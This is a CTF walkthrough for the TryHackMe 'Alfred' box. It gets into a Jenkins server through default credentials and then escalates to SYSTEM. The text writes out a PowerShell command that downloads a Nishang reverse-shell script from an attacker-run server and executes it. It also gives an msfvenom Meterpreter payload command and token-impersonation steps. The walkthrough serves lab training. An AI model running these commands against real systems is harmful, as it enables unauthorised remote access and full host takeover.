Alfred

Jenkins is a popular automation server used by developers for continuous integration and pipelines. It allows for easier code deployment when changes in code are made. This article demonstrates an exploit made possible due to misconfiguration. Special thanks to TryHackMe for hosting this box.

Running an Nmap scan determines that ports 80, 3389 and 8080 are open.

Visiting port 8080 displays a Jenkins login portal. Access is made possible because the administrator never changed the default login credentials.

Login made possible by using admin/admin.

Looking around the site there appears to an area to execute commands located within a current project > configure > build tab.

There is a reverse shell available from Nishang called Invoke-PowerShellTcp. Copy the text from Nishang’s GitHub, paste the text to an empty file in kali and name it Invoke-PowerShellTcp.ps1.

Then start a netcat listener and a python HTTP server in the directory that Invoke-PowerShellTcp.ps1 is currently stored.

Next, use the suggested command and make sure to enter the needed IP and ports. For better understanding I have added notes inside of this command.

powershell iex (New-Object  Net.WebClient).DownloadString('http://YourIP:YourHTTPServerPort/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp  -Reverse -IPAddress YourIP -Port YourNetCatPort

Ready to save and Build Now.

Clicking Save then Build Now should run the configuration and if successful, download Invoke-PowerShellTcp.ps1 from the python HTTP server. Once downloaded the file will be executed resulting in netcat presenting a reverse shell.

The file Invoke-PowerShellTcp.ps1 was successfully downloaded and executed resulting in a reverse shell.

Privilege escalation can be accomplished by switching to a meterpreter shell. To do this create a reverse shell payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<YourIP> LPORT=<ChoosePort> -f exe -o <NameYourFile>.exe

Cancel the project that is currently running by clicking on the red x.

Downloading the payload can be accomplished the same way as in the previously completed step from the python HTTP server. But, before clicking Build Now, load Metasploit and run a multi/handler.

Syntax ready to be saved. But not before creating the Metasploit multi/handler first.

Setup and running multi/handler.

With that set it is now time to save and click Build Now

Payload was successfully downloaded.

Go back and execute the payload by running its file name. With any luck this should spawn a meterpreter session.

Executing the payload file.

Meterpreter session loaded.

We can privilege escalate this initial access to system access by using token impersonation.

Change meterpreter to a shell to view the privileges of the current user.

Check the privileges of the current user.

whoami /priv

It appears that Impersonate and Debug are both enabled.

To take advantage of this, background the current shell back to meterpreter and run incognito.

We can check which tokens are available and attempt to impersonate one of them. It appears that the builtin Administrators group might be available for impersonation.

Using list_tokens -g propagates a large list of available tokens.

Impersonation was successful!

Verify who the impersonated user of the host is by running getuid.

You might not always have the same elevated privileges as the user even though the higher privileged token has been impersonated. To get around this migrate to a process that has those permissions. To view the running processes use the ps command and note the PID that you’d like to migrate to.

PS to display running processes.

Migrate the process to the desired PID number.